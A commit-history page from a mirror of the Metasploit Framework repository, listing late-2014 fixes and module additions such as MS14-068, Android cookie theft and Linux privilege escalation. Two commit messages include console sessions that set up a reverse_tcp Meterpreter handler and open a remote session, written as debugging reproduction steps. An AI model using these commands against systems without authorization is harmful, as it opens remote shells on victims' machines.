mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00
Commit Graph

30039 Commits

Author SHA1 Message Date
jvazquez-r7
f17a7e8a61 Better handling of the unix domain socket argument 2014-12-30 18:36:28 -06:00
jvazquez-r7
4df4e8b9d6 Add support for linux meterpreter migration 2014-12-30 18:34:24 -06:00
jvazquez-r7
56df2d0062 Add support for linux meterpreter migrate types 2014-12-30 18:30:15 -06:00
sinn3r
553030b22d
Land #4473 - Log backtraces by default 2014-12-30 18:13:33 -06:00
Tod Beardsley
d248cad462
Fixes #4472, a broken meterpreter script 2014-12-30 14:32:59 -06:00
Tod Beardsley
135faeee29
Land #4095, specs for Rex::OLE 2014-12-30 14:25:09 -06:00
Christian Mehlmauer
6444d8ba64
use kind_of? for checking exceptions 2014-12-30 21:16:57 +01:00
William Vu
ce0bbca6ed
Land #4487, no spinnerz on Windows :( 2014-12-30 14:06:05 -06:00
Tod Beardsley
a8e907d68b
Land #4479, nil comparisons and missing DLLs
Also fixes #4474.
2014-12-30 13:55:54 -06:00
sinn3r
48919eadb6
Land #4444 - i-FTP BoF 2014-12-30 12:38:28 -06:00
Brent Cook
bdac5db695 remove usage of ==/!= nil
Adjust all module-loading libraries to have consistent nil?/!nil? checking and
'if' style.
2014-12-30 10:59:49 -06:00
Brent Cook
125cc27f7a updated expected exception from a bad module load 2014-12-30 10:57:37 -06:00
Tod Beardsley
6ded5a7eb4
Avoid spinner on Windows
Fixes #4147, probably.
2014-12-30 10:17:56 -06:00
William Vu
4fd4d51d78
Land #4485, Drupageddon greedy regex fix 2014-12-30 10:16:57 -06:00
sinn3r
5c2f972ec1
Land #4483 - Alias Rex::Ui::Text::Output::Tee print_raw to write 2014-12-30 02:23:00 -06:00
Christian Mehlmauer
96fe693c54
update drupal regex 2014-12-30 09:12:39 +01:00
Jon Hart
d727ac5367
Alias Rex::Ui::Text::Output::Tee print_raw to write, fixes #4469 and #4363 2014-12-29 16:47:04 -08:00
jvazquez-r7
e55b612206
Land #4482, @wchen-r7's fix for response_timeout on sessions command 2014-12-29 17:34:29 -06:00
sinn3r
9af3fd01d4 Fix response_timeout
response_timeout is a method specific to a meterpreter session, not
shell. So if the user is using a shell type payload, he will never
see a backtrace before interacting with the sessions.
2014-12-29 17:03:50 -06:00
sinn3r
555713b6ae
Land #4456 - MS14-068, Kerberos Checksum (plus krb protocol support) 2014-12-29 16:09:28 -06:00
sinn3r
f2130311fa Add the MSF blog reference 2014-12-29 16:08:35 -06:00
Brent Cook
f9b141c1e2
Land #4442, wchen-r7's configurable session response timeout option
fixes #4431
2014-12-29 13:02:47 -06:00
Brent Cook
5d70b837ed handle nil results from MeterpreterBinaries.path
When a meterpreter binary cannot be found, give the user some hint about what
went wrong.

```
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.43.1
lhost => 192.168.43.1
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.43.1:4444
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.43.252
[*] Meterpreter session 1 opened (192.168.43.1:4444 -> 192.168.43.252:49297) at 2014-12-29 12:32:37 -0600

meterpreter > use mack
Loading extension mack...
[-] Failed to load extension: No module of the name ext_server_mack.x86.dll found
```

This is also useful for not scaring away would-be developers who replaced only
half (the wrong half) of their DLLs from a fresh meterpreter build and
everything exploded. Not that that's ever happened to me :)
2014-12-29 12:34:02 -06:00
Tod Beardsley
72eb8e6503
Land #4475, inverted timeout fix 2014-12-29 11:37:28 -06:00
Brent Cook
e286aeb837 patch metsvc to use MeterpreterBinaries.path
fixes #4472
2014-12-29 11:21:21 -06:00
Brent Cook
bbb41c39b8 fix backward meterpreter packet timeout logic
The current logic times out every packet almost immediately, making it possible
for almost any non-trivial meterpreter session to receive duplicate packets.

This causes problems especially with any interactions that involve passing
resource handles or pointers back and forth between MSF and meterpreter, since
meterpreter can be told to operate on freed pointers, double-closes, etc.

This probably fixes tons of heisenbugs, including #3798.

To reproduce this, I enabled all debug messages in meterpreter to slow it
down, then ran this RC script with a reverse TCP meterpreter, after linking in
the test modules:

(cd modules/post
 ln -s ../../test/modules/post/test)

die.rc:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.43.1
exploit -j
sleep 5
use post/test/services
set SESSION 1
run
2014-12-29 08:15:51 -06:00
Tod Beardsley
1dd9d60e34
Land #4461, Android cookie database theft
Thanks @jvennix-r7!
2014-12-29 08:15:21 -06:00
Tod Beardsley
d10222365b
Add Rafay's blog as a reference 2014-12-29 08:12:19 -06:00
jvennix-r7
c9f43e744d Merge pull request #16 from todb-r7/fixup-4461
Fixup #4461, Android sqllite theft bug
2014-12-28 23:08:10 -06:00
Christian Mehlmauer
3a73b40a1e
more error handling 2014-12-29 00:39:00 +01:00
Christian Mehlmauer
7b52bcb657
log errors into framework.log 2014-12-29 00:20:26 +01:00
Tod Beardsley
1236684954
Use get_uri instead, note lack of Rex::Text method
See rapid7#4461
2014-12-28 15:06:34 -06:00
Tod Beardsley
788e315fd4
Fix msftidy warnings 2014-12-28 14:53:29 -06:00
William Vu
01daadcc49
Land #4470, bind_hidden_ipknock_tcp stager 2014-12-27 17:11:25 -06:00
Borja Merino
9791acd0bf Add stager ipknock shellcode (PR 2) 2014-12-27 22:03:45 +01:00
jvazquez-r7
04772c8946 Ensure stop_service closes Rex::Proto::Http::Server 2014-12-26 13:50:03 -06:00
jvazquez-r7
655cfdd416
Land #4321, @wchen-r7's fixes #4246 ms01_026_dbldecode undef method 2014-12-26 12:48:29 -06:00
Jon Hart
51049152b6
Use Rex::Text.rand_mail_address for more realistic fake commit 2014-12-26 10:39:52 -08:00
jvazquez-r7
c1b0385a4b
Land #4460, @Meatballs1's ssl cert validation bypass on powershell web delivery 2014-12-26 12:07:45 -06:00
jvazquez-r7
2bed52dcd5
Land #4459, @bcoles's ProjectSend Arbitrary File Upload module 2014-12-26 11:28:42 -06:00
jvazquez-r7
b5b0be9001 Do minor cleanup 2014-12-26 11:24:02 -06:00
jvazquez-r7
85ab11cf52 Use print_warning consistently 2014-12-26 09:54:38 -06:00
jvazquez-r7
f31a2e070e Use print_warning to print the Kerberos error 2014-12-26 09:22:09 -06:00
jvazquez-r7
2992ae0630
Land Code to handle kerberos error codes 2014-12-24 18:06:14 -06:00
jvazquez-r7
d148848d31 Support Kerberos error codes 2014-12-24 18:05:48 -06:00
jvazquez-r7
bde92b26e9
Land #3695, @jakoblell linux desktop privilege escalation
* through screensavers / policykit user component hijacking
2014-12-24 15:52:40 -06:00
jvazquez-r7
121c0406e9 Beautify restart_command creation 2014-12-24 15:52:15 -06:00
jvazquez-r7
43ec8871bc Do minor c code cleanup 2014-12-24 15:45:38 -06:00
jvazquez-r7
92113a61ce Check payload 2014-12-24 15:43:49 -06:00
jvazquez-r7
36ac0e6279 Clean get_restart_commands 2014-12-24 14:55:18 -06:00